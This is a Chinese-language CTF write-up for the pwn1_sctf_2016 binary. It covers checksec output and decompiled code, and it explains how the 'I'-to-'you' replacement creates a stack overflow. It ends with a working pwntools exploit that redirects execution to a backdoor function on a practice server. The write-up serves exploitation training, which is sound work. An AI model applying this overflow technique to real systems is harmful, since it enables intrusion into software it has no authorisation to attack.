pwn1 sctf 2016

前提

查看文件保护

root@localhost ~# checksec pwn1_sctf_2016
[*] '/root/pwn1_sctf_2016'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

静态分析

主函数只调用了一个vuln函数，该函数如下

int vuln()
{
  const char *v0; // eax
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
  char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
  char v4[7]; // [esp+40h] [ebp-18h] BYREF
  char v5; // [esp+47h] [ebp-11h] BYREF
  char v6[7]; // [esp+48h] [ebp-10h] BYREF
  char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

  printf("Tell me something about yourself: ");
  fgets(s, 32, edata);
  std::string::operator=(&input, s);
  std::allocator<char>::allocator(&v5);
  std::string::string(v4, "you", &v5);
  std::allocator<char>::allocator(v7);
  std::string::string(v6, "I", v7);
  replace((std::string *)v3);
  std::string::operator=(&input, v3, v6, v4);
  std::string::~string(v3);
  std::string::~string(v6);
  std::allocator<char>::~allocator(v7);
  std::string::~string(v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(s, v0);
  return printf("So, %s\n", s);
}

查找函数表发现后门函数get_flag

int get_flag()
{
  return system("cat flag.txt");
}

思路分析

1. 目前信息
   • 变量s处可写入32字节数据
   • s距离返回地址的偏移量为0x3c+4>32，不够溢出
   • 存在后门函数
2. replace函数
   • 查看后发现其作用为循环检测将我们输入的字符I替换为字符you
3. 思路
   • replace函数在字符替换的过程中将1个字节替换为了3个字节的数据，所以理论上可以通过输入21个I加1个a的方式溢出到返回地址处，将该处覆盖为后门函数的地址即可获得flag

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/pwn1_sctf_2016/pwn1_sctf_2016'
# io = process(pwnfile)
io = remote('node4.buuoj.cn', 28185)
elf = ELF(pwnfile)
backdoor = elf.symbols['get_flag']
payload = flat(['I'*21, 'a', backdoor])
io.sendline(payload)
io.interactive()